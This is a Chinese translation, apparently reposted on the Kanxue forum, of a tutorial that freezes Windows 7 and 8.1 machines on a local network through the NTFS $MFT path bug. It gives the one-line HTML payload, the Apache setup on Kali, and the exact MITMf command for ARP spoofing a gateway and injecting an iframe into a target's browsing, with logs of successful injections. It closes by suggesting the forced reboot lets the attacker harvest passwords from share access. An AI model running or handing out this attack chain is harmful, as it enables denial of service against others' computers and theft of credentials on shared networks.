通过MITMf利用$MFT漏洞锁定局域网电脑
虽然还没有被微软官方确认,但是signature Alladin Information公司研究员Anatolymik(俄罗斯)发现的bug,可以被用来锁定windows 7和 windows8.1系统。而且只需要简单的调用一个文件就可以实现锁定。
$MFT,保存着NTFS文件系统中每个文件的入口,当我们访问C: \ $ MFT \ hello.txt这个文件时,NT文件系统就会锁定整个C盘,因为C盘是系统盘,所以整个系统都会被锁定。
这个漏洞可以被本地利用,也可以远程通过IE或者Firefox利用,Chrome不受影响,我们可以使用MITMF引诱用户访问我们构造好的html页面从而利用该漏洞。
准备环境:
我们使用一台win7的机器,ip地址为 192.168.1.67。一台Kali机器,ip地址为 192.168.1.11。
使用MITMF利用MFT进行攻击
把恶意代码放在web服务器上,启动Kali机器的apache2服务:
root@kali:~# /etc/init.d/apache2 start
[ ok ] Starting apache2 (via systemctl): apache2.service.
root@kali:~#
我们用一个html文件来调用$MFT,然后将这个html文件通过MITMf以<iframe>的形式注入到目标用户的网页中,然后让目标访问。
将这个html文件命名为nice.html,然后放到/var/www/html路径下:
root@kali:/var/www/html# ls
index.html nice.html
root@kali:/var/www/html# cat nice.html
<html>
<img src="c:\$MFT\123" alt="Smiley face" height="42" width="42">
</html>
root@kali:/var/www/html#
这个html文件很简单,但是足够完成攻击了。
发动攻击
先确定apache服务启动:
root@kali:/var/www/html# /etc/init.d/apache2 status
● apache2.service - The Apache HTTP Server
Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled)
Active: active (running) since Tue 2017-05-30 12:16:16 EDT; 5min ago
Process: 1104 ExecStart=/usr/sbin/apachectl start (code=exited, status=0/SUCCESS)
Main PID: 1115 (apache2)
Tasks: 7 (limit: 4915)
CGroup: /system.slice/apache2.service
├─1115 /usr/sbin/apache2 -k start
├─1133 /usr/sbin/apache2 -k start
├─1134 /usr/sbin/apache2 -k start
├─1135 /usr/sbin/apache2 -k start
├─1136 /usr/sbin/apache2 -k start
├─1137 /usr/sbin/apache2 -k start
└─1138 /usr/sbin/apache2 -k start
May 30 12:16:15 kali systemd[1]: Starting The Apache HTTP Server...
May 30 12:16:16 kali apachectl[1104]: AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1. Set the 'ServerName' d…s this message
May 30 12:16:16 kali systemd[1]: Started The Apache HTTP Server.
Hint: Some lines were ellipsized, use -l to show in full.
确定OK后,我们启动MITMf将这个html注入给我们的目标,命令如下:
root@kali:~/MITMf# python ./mitmf.py --spoof --arp -i eth0 --gateway 192.168.1.254 --target 192.168.1.67 --inject --html-url http://192.168.1.111/nice.html
这里我们告诉MITMf来欺骗网关192.168.1.254,目标机器是192.168.1.67,我们想注入http://192.168.1.111/nice.html到目标用户的浏览器上。
这条命令的输出应该如下所示:
root@kali:~/MITMf# python ./mitmf.py --spoof --arp -i eth0 --gateway 192.168.1.254 --target 192.168.1.67 --inject --html-url http://192.168.1.111/nice.html
@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@ @@@@@@@@
@@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@@ @@@@@@@@
@@! @@! @@! @@! @@! @@! @@! @@! @@!
!@! !@! !@! !@! !@! !@! !@! !@! !@!
@!! !!@ @!@ !!@ @!! @!! !!@ @!@ @!!!:!
!@! ! !@! !!! !!! !@! ! !@! !!!!!:
!!: !!: !!: !!: !!: !!: !!:
<img draggable="false" class="emoji" alt="" src="https://s.w.org/images/core/emoji/2.3/svg/2757.svg" scale="0"> <img draggable="false" class="emoji" alt="" src="https://s.w.org/images/core/emoji/2.3/svg/2757.svg" scale="0"> <img draggable="false" class="emoji" alt="" src="https://s.w.org/images/core/emoji/2.3/svg/2757.svg" scale="0"> <img draggable="false" class="emoji" alt="" src="https://s.w.org/images/core/emoji/2.3/svg/2757.svg" scale="0"> <img draggable="false" class="emoji" alt="" src="https://s.w.org/images/core/emoji/2.3/svg/2757.svg" scale="0"> <img draggable="false" class="emoji" alt="" src="https://s.w.org/images/core/emoji/2.3/svg/2757.svg" scale="0"> <img draggable="false" class="emoji" alt="" src="https://s.w.org/images/core/emoji/2.3/svg/2757.svg" scale="0">
::: :: :: :: ::: :: ::
: : : : : : :
[*] MITMf v0.9.8 - 'The Dark Side'
|
|_ Net-Creds v1.0 online
|_ Inject v0.4
|_ Spoof v0.6
| |_ ARP spoofing enabled
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ MITMf-API online
Error starting HTTP server: [Errno 98] Address already in use
* Running on http://127.0.0.1:9999/ (Press CTRL+C to quit)
|_ HTTP server online
|_ DNSChef v0.4 online
|_ SMB server online
我们的目标访问任何页面,MITMf都会尝试将我们设计好的html注入到用户浏览页面中:
2017-05-30 12:27:07 192.168.1.67 [type:IE-8 os:Windows 7] www.bing.com
2017-05-30 12:27:26 192.168.1.67 [type:IE-8 os:Windows 7] elpais.com.co
2017-05-30 12:27:26 192.168.1.67 [type:IE-8 os:Windows 7] [Inject] Injected HTML Iframe: elpais.com.co
2017-05-30 12:27:27 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] [Inject] Injected HTML Iframe: www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] sso.elpais.com.co
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] www.googletagservices.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] www.google.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] s7.addthis.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] code3.adtlgc.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] tag.navdmp.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] raw.githack.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] b.scorecardresearch.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] s.clickiocdn.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] s.clickiocdn.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] cdnjs.cloudflare.com
2017-05-30 12:27:29 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:31 192.168.1.67 [type:IE-8 os:Windows 7] cdnjs.cloudflare.com
2017-05-30 12:27:31 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:31 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:31 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:31 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:32 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:32 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:32 192.168.1.67 [type:IE-8 os:Windows 7] cdn.cxense.com
2017-05-30 12:27:33 192.168.1.67 [type:IE-8 os:Windows 7] api.cxense.com
2017-05-30 12:27:33 192.168.1.67 [type:IE-8 os:Windows 7] api.cxense.com
2017-05-30 12:27:33 192.168.1.67 [type:IE-8 os:Windows 7] comcluster.cxense.com
2017-05-30 12:27:33 192.168.1.67 [type:Other-Other os:Other] g.symcd.com
2017-05-30 12:27:34 192.168.1.67 [type:Other-Other os:Other] clients1.google.com
2017-05-30 12:27:34 192.168.1.67 [type:IE-8 os:Windows 7] www.gstatic.com
2017-05-30 12:27:34 192.168.1.67 [type:IE-8 os:Windows 7] tpc.googlesyndication.com
2017-05-30 12:27:34 192.168.1.67 [type:IE-8 os:Windows 7] [Inject] Injected HTML Iframe: tpc.googlesyndication.com
2017-05-30 12:27:34 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:35 192.168.1.67 [type:IE-8 os:Windows 7] 192.168.1.111
可以看到iframe已经成功的注入了几次:
2017-05-30 12:27:26 192.168.1.67 [type:IE-8 os:Windows 7] [Inject] Injected HTML Iframe: elpais.com.co
2017-05-30 12:27:27 192.168.1.67 [type:IE-8 os:Windows 7] www.elpais.com.co
2017-05-30 12:27:28 192.168.1.67 [type:IE-8 os:Windows 7] [Inject] Injected HTML Iframe: www.elpais.com.co
上面的信息显示,html已被成功注入了几次,这时我们的目标的“计算机”反应巨慢,然后会被锁住,
win7机器被MITMf利用$MFT漏洞锁住了
现在我们的目标只有重启电脑,这样我们可以趁机在他们访问共享资源的时候抓取密码。
写在最后
这种类型的攻击执行很简单,上面的例子只是一种可能,微软到现在还没有确认这个漏洞,所以我们会在接下来的几周看到更多的这种攻击。
最后,我们看看ascinema的展示:
ascinema演示参考原博地址:https://www.sysadminjd.com/vulnerabilidades-cmft-bloqueando-equipos-en-la-lan-con-mitmf/
正如演示的,利用这个漏洞很简单,为了防止被该漏洞攻击,我们只能使用Chrome,或者等着微软和Firefox发布补丁了。
---------------------------------------------------------------------
翻译说明:
这篇文章是另一篇译文ADV170014 NTLM SSO 漏洞利用指南中提到的文章。
原文是西班牙文,所以有些地方可能翻译的不是很清楚,不过文章的内容很简单。译者用win7测试了下,用IE和Firefox都复测成功,不过另一台升级补丁的win7没有成功,应该是微软已经出了针对这个的补丁了吧。
其他参考:
1.中间人攻击利用框架 MITMf:https://github.com/byt3bl33d3r/MITMf
2.文章中提到的那个俄罗斯研究员的博客:Баг в NTFS, или как подвесить всю систему(A bug in NTFS,or how to hang the entire system): https://habrahabr.ru/company/aladdinrd/blog/329166/
---------------------------------------------------------------------
本文由看雪翻译小组 LImp 编译
转载请注明来自看雪社区
热门阅读
点击阅读原文/read,
更多干货等着你~